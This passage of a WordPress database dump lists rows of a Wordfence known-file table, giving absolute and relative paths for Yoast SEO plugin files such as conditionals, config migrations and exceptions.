(1343, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/admin/post-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/admin/post-conditional.php'),
(1344, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/admin/posts-overview-or-ajax-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/admin/posts-overview-or-ajax-conditional.php'),
(1345, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/admin/yoast-admin-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/admin/yoast-admin-conditional.php'),
(1346, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/admin-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/admin-conditional.php'),
(1347, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/attachment-redirections-enabled-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/attachment-redirections-enabled-conditional.php'),
(1348, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/conditional-interface.php', 'wp-content/plugins/wordpress-seo/src/conditionals/conditional-interface.php'),
(1349, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/deactivating-yoast-seo-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/deactivating-yoast-seo-conditional.php'),
(1350, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/development-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/development-conditional.php'),
(1351, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/feature-flag-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/feature-flag-conditional.php'),
(1352, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/front-end-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/front-end-conditional.php'),
(1353, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/get-request-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/get-request-conditional.php'),
(1354, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/headless-rest-endpoints-enabled-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/headless-rest-endpoints-enabled-conditional.php'),
(1355, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/import-tool-selected-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/import-tool-selected-conditional.php'),
(1356, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/jetpack-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/jetpack-conditional.php'),
(1357, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/migrations-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/migrations-conditional.php'),
(1358, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/new-settings-ui-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/new-settings-ui-conditional.php');
INSERT INTO `wpou_wfknownfilelist` VALUES
(1359, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/news-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/news-conditional.php'),
(1360, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/no-conditionals-trait.php', 'wp-content/plugins/wordpress-seo/src/conditionals/no-conditionals-trait.php'),
(1361, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/no-tool-selected-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/no-tool-selected-conditional.php'),
(1362, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/non-multisite-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/non-multisite-conditional.php'),
(1363, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/not-admin-ajax-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/not-admin-ajax-conditional.php'),
(1364, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/open-graph-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/open-graph-conditional.php'),
(1365, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/premium-active-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/premium-active-conditional.php'),
(1366, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/premium-inactive-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/premium-inactive-conditional.php'),
(1367, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/primary-category-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/primary-category-conditional.php'),
(1368, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/robots-txt-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/robots-txt-conditional.php'),
(1369, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/semrush-enabled-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/semrush-enabled-conditional.php'),
(1370, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/settings-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/settings-conditional.php'),
(1371, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/should-index-links-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/should-index-links-conditional.php'),
(1372, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/text-formality-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/text-formality-conditional.php'),
(1373, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/third-party/elementor-activated-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/third-party/elementor-activated-conditional.php'),
(1374, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/third-party/elementor-edit-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/third-party/elementor-edit-conditional.php'),
(1375, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/third-party/jetpack-boost-active-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/third-party/jetpack-boost-active-conditional.php'),
(1376, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/third-party/jetpack-boost-not-premium-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/third-party/jetpack-boost-not-premium-conditional.php'),
(1377, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/third-party/polylang-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/third-party/polylang-conditional.php'),
(1378, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/third-party/translatepress-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/third-party/translatepress-conditional.php'),
(1379, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/third-party/w3-total-cache-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/third-party/w3-total-cache-conditional.php'),
(1380, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/third-party/wordproof-integration-active-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/third-party/wordproof-integration-active-conditional.php'),
(1381, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/third-party/wordproof-plugin-inactive-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/third-party/wordproof-plugin-inactive-conditional.php'),
(1382, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/third-party/wpml-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/third-party/wpml-conditional.php'),
(1383, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/third-party/wpml-wpseo-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/third-party/wpml-wpseo-conditional.php'),
(1384, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/traits/admin-conditional-trait.php', 'wp-content/plugins/wordpress-seo/src/conditionals/traits/admin-conditional-trait.php'),
(1385, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/updated-importer-framework-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/updated-importer-framework-conditional.php'),
(1386, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/user-can-manage-wpseo-options-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/user-can-manage-wpseo-options-conditional.php'),
(1387, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/user-can-publish-posts-and-pages-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/user-can-publish-posts-and-pages-conditional.php'),
(1388, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/user-profile-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/user-profile-conditional.php'),
(1389, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/web-stories-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/web-stories-conditional.php'),
(1390, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/wincher-automatically-track-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/wincher-automatically-track-conditional.php'),
(1391, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/wincher-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/wincher-conditional.php'),
(1392, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/wincher-enabled-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/wincher-enabled-conditional.php'),
(1393, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/wincher-token-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/wincher-token-conditional.php'),
(1394, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/woocommerce-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/woocommerce-conditional.php'),
(1395, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/wp-cron-enabled-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/wp-cron-enabled-conditional.php'),
(1396, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/wp-robots-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/wp-robots-conditional.php'),
(1397, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/xmlrpc-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/xmlrpc-conditional.php'),
(1398, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/yoast-admin-and-dashboard-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/yoast-admin-and-dashboard-conditional.php'),
(1399, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/yoast-tools-page-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/yoast-tools-page-conditional.php'),
(1400, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/badge-group-names.php', 'wp-content/plugins/wordpress-seo/src/config/badge-group-names.php'),
(1401, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/conflicting-plugins.php', 'wp-content/plugins/wordpress-seo/src/config/conflicting-plugins.php'),
(1402, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/indexing-reasons.php', 'wp-content/plugins/wordpress-seo/src/config/indexing-reasons.php'),
(1403, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migration-status.php', 'wp-content/plugins/wordpress-seo/src/config/migration-status.php'),
(1404, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20171228151840_WpYoastIndexable.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20171228151840_WpYoastIndexable.php'),
(1405, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20171228151841_WpYoastPrimaryTerm.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20171228151841_WpYoastPrimaryTerm.php'),
(1406, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20190529075038_WpYoastDropIndexableMetaTableIfExists.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20190529075038_WpYoastDropIndexableMetaTableIfExists.php'),
(1407, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20191011111109_WpYoastIndexableHierarchy.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20191011111109_WpYoastIndexableHierarchy.php'),
(1408, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20200408101900_AddCollationToTables.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20200408101900_AddCollationToTables.php'),
(1409, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20200420073606_AddColumnsToIndexables.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20200420073606_AddColumnsToIndexables.php'),
(1410, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20200428123747_BreadcrumbTitleAndHierarchyReset.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20200428123747_BreadcrumbTitleAndHierarchyReset.php'),
(1411, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20200428194858_ExpandIndexableColumnLengths.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20200428194858_ExpandIndexableColumnLengths.php'),
(1412, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20200429105310_TruncateIndexableTables.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20200429105310_TruncateIndexableTables.php'),
(1413, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20200430075614_AddIndexableObjectIdAndTypeIndex.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20200430075614_AddIndexableObjectIdAndTypeIndex.php'),
(1414, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20200430150130_ClearIndexableTables.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20200430150130_ClearIndexableTables.php'),
(1415, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20200507054848_DeleteDuplicateIndexables.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20200507054848_DeleteDuplicateIndexables.php'),
(1416, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20200513133401_ResetIndexableHierarchyTable.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20200513133401_ResetIndexableHierarchyTable.php'),
(1417, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20200609154515_AddHasAncestorsColumn.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20200609154515_AddHasAncestorsColumn.php'),
(1418, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20200616130143_ReplacePermalinkHashIndex.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20200616130143_ReplacePermalinkHashIndex.php'),
(1419, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20200617122511_CreateSEOLinksTable.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20200617122511_CreateSEOLinksTable.php'),
(1420, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20200702141921_CreateIndexableSubpagesIndex.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20200702141921_CreateIndexableSubpagesIndex.php'),
(1421, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20200728095334_AddIndexesForProminentWordsOnIndexables.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20200728095334_AddIndexesForProminentWordsOnIndexables.php'),
(1422, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20201202144329_AddEstimatedReadingTime.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20201202144329_AddEstimatedReadingTime.php'),
(1423, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20201216124002_ExpandIndexableIDColumnLengths.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20201216124002_ExpandIndexableIDColumnLengths.php'),
(1424, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20201216141134_ExpandPrimaryTermIDColumnLengths.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20201216141134_ExpandPrimaryTermIDColumnLengths.php'),
(1425, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20210817092415_AddVersionColumnToIndexables.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20210817092415_AddVersionColumnToIndexables.php'),
(1426, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20211020091404_AddObjectTimestamps.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20211020091404_AddObjectTimestamps.php'),
(1427, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/migrations/20230417083836_AddInclusiveLanguageScore.php', 'wp-content/plugins/wordpress-seo/src/config/migrations/20230417083836_AddInclusiveLanguageScore.php'),
(1428, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/oauth-client.php', 'wp-content/plugins/wordpress-seo/src/config/oauth-client.php'),
(1429, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/researcher-languages.php', 'wp-content/plugins/wordpress-seo/src/config/researcher-languages.php'),
(1430, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/schema-ids.php', 'wp-content/plugins/wordpress-seo/src/config/schema-ids.php'),
(1431, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/schema-types.php', 'wp-content/plugins/wordpress-seo/src/config/schema-types.php'),
(1432, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/semrush-client.php', 'wp-content/plugins/wordpress-seo/src/config/semrush-client.php'),
(1433, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/wincher-client.php', 'wp-content/plugins/wordpress-seo/src/config/wincher-client.php'),
(1434, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/wincher-pkce-provider.php', 'wp-content/plugins/wordpress-seo/src/config/wincher-pkce-provider.php'),
(1435, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/wordproof-app-config.php', 'wp-content/plugins/wordpress-seo/src/config/wordproof-app-config.php'),
(1436, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/config/wordproof-translations.php', 'wp-content/plugins/wordpress-seo/src/config/wordproof-translations.php'),
(1437, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/content-type-visibility/application/content-type-visibility-dismiss-notifications.php', 'wp-content/plugins/wordpress-seo/src/content-type-visibility/application/content-type-visibility-dismiss-notifications.php'),
(1438, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/content-type-visibility/application/content-type-visibility-watcher-actions.php', 'wp-content/plugins/wordpress-seo/src/content-type-visibility/application/content-type-visibility-watcher-actions.php'),
(1439, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/content-type-visibility/user-interface/content-type-visibility-dismiss-new-route.php', 'wp-content/plugins/wordpress-seo/src/content-type-visibility/user-interface/content-type-visibility-dismiss-new-route.php'),
(1440, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/context/meta-tags-context.php', 'wp-content/plugins/wordpress-seo/src/context/meta-tags-context.php'),
(1441, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/admin/class-helpscout.php', 'wp-content/plugins/wordpress-seo/src/deprecated/admin/class-helpscout.php'),
(1442, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/admin/views/class-view-utils.php', 'wp-content/plugins/wordpress-seo/src/deprecated/admin/views/class-view-utils.php'),
(1443, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/frontend/breadcrumbs.php', 'wp-content/plugins/wordpress-seo/src/deprecated/frontend/breadcrumbs.php'),
(1444, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/frontend/frontend.php', 'wp-content/plugins/wordpress-seo/src/deprecated/frontend/frontend.php'),
(1445, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/index.php', 'wp-content/plugins/wordpress-seo/src/deprecated/index.php'),
(1446, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexables-page-action.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexables-page-action.php'),
(1447, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/actions/settings-introduction-action.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/actions/settings-introduction-action.php'),
(1448, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/conditionals/indexables-page-conditional.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/conditionals/indexables-page-conditional.php'),
(1449, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/conditionals/schema-blocks-conditional.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/conditionals/schema-blocks-conditional.php'),
(1450, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/helpers/indexables-page-helper.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/helpers/indexables-page-helper.php'),
(1451, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/helpers/input-helper.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/helpers/input-helper.php'),
(1452, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/indexables-page-integration.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/indexables-page-integration.php'),
(1453, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/old-premium-integration.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/old-premium-integration.php'),
(1454, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/redirect-old-features-tab-integration.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/redirect-old-features-tab-integration.php'),
(1455, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/social-templates-integration.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/social-templates-integration.php'),
(1456, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/unsupported-php-version.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/unsupported-php-version.php'),
(1457, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/schema-blocks.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/schema-blocks.php'),
(1458, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/third-party/wincher.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/third-party/wincher.php'),
(1459, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/third-party/wordproof-integration-toggle.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/third-party/wordproof-integration-toggle.php'),
(1460, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/routes/indexables-page-route.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/routes/indexables-page-route.php'),
(1461, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/routes/settings-introduction-route.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/routes/settings-introduction-route.php'),
(1462, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/deprecated/src/schema-templates/assets/icons.php', 'wp-content/plugins/wordpress-seo/src/deprecated/src/schema-templates/assets/icons.php'),
(1463, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/editors/application/analysis-features/enabled-analysis-features-repository.php', 'wp-content/plugins/wordpress-seo/src/editors/application/analysis-features/enabled-analysis-features-repository.php'),
(1464, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/editors/domain/analysis-features/analysis-feature.php', 'wp-content/plugins/wordpress-seo/src/editors/domain/analysis-features/analysis-feature.php'),
(1465, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/editors/domain/analysis-features/analysis-features-list.php', 'wp-content/plugins/wordpress-seo/src/editors/domain/analysis-features/analysis-features-list.php'),
(1466, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/editors/framework/analysis-feature-interface.php', 'wp-content/plugins/wordpress-seo/src/editors/framework/analysis-feature-interface.php'),
(1467, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/editors/framework/cornerstone-content.php', 'wp-content/plugins/wordpress-seo/src/editors/framework/cornerstone-content.php'),
(1468, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/editors/framework/inclusive-language-analysis.php', 'wp-content/plugins/wordpress-seo/src/editors/framework/inclusive-language-analysis.php'),
(1469, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/editors/framework/keyphrase-analysis.php', 'wp-content/plugins/wordpress-seo/src/editors/framework/keyphrase-analysis.php'),
(1470, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/editors/framework/previously-used-keyphrase.php', 'wp-content/plugins/wordpress-seo/src/editors/framework/previously-used-keyphrase.php'),
(1471, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/editors/framework/readability-analysis.php', 'wp-content/plugins/wordpress-seo/src/editors/framework/readability-analysis.php'),
(1472, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/editors/framework/word-form-recognition.php', 'wp-content/plugins/wordpress-seo/src/editors/framework/word-form-recognition.php'),
(1473, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-activation-error-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-activation-error-exception.php'),
(1474, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-already-installed-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-already-installed-exception.php'),
(1475, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-installation-error-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-installation-error-exception.php'),
(1476, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/user-cannot-activate-plugins-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/user-cannot-activate-plugins-exception.php'),
(1477, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/user-cannot-install-plugins-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/user-cannot-install-plugins-exception.php'),
(1478, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/forbidden-property-mutation-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/forbidden-property-mutation-exception.php'),
(1479, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/importing/aioseo-validation-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/importing/aioseo-validation-exception.php'),
(1480, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/indexable/author-not-built-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/indexable/author-not-built-exception.php'),
(1481, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/exceptions/indexable/indexable-exception.php', 'wp-content/plugins/wordpress-seo/src/exceptions/indexable/indexable-exception.php'),
